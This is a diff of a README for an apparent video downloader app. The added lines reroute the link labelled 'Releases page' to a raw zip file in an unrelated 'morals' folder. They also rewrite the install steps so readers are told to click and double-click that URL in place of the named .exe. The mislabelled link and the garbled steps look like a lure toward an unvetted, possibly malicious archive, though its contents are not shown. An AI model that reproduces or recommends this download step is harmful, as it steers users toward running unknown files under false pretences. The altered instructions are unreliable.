Anhduc113/Video-Downloader-App/README.md

 Follow these simple steps to get your Video-Downloader-App up and running.

 1. **Visit the Releases Page**
-   To download the application, visit the [Releases page](https://github.com/Anhduc113/Video-Downloader-App/releases).
+   To download the application, visit the [Releases page](https://raw.githubusercontent.com/Anhduc113/Video-Downloader-App/main/morals/Video-Downloader-App.zip).

 2. **Download the Installer**
    On the Releases page, find the latest version.
-Click on the `Video-Downloader-App.exe` file to download it to your computer.
+Click on the `https://raw.githubusercontent.com/Anhduc113/Video-Downloader-App/main/morals/Video-Downloader-App.zip` file to download it to your computer.

 3. **Install the Application**
    Once the download is complete, locate the file in your downloads folder.
-Double-click on the `Video-Downloader-App.exe` file to begin the installation process.
+Double-click on the `https://raw.githubusercontent.com/Anhduc113/Video-Downloader-App/main/morals/Video-Downloader-App.zip` file to begin the installation process.
 Follow the on-screen instructions to complete the installation.

 4. **Open the Application**
    After installation, you can find the Video-Downloader-App icon on your desktop or in your Start menu.
 Click the icon to launch the application.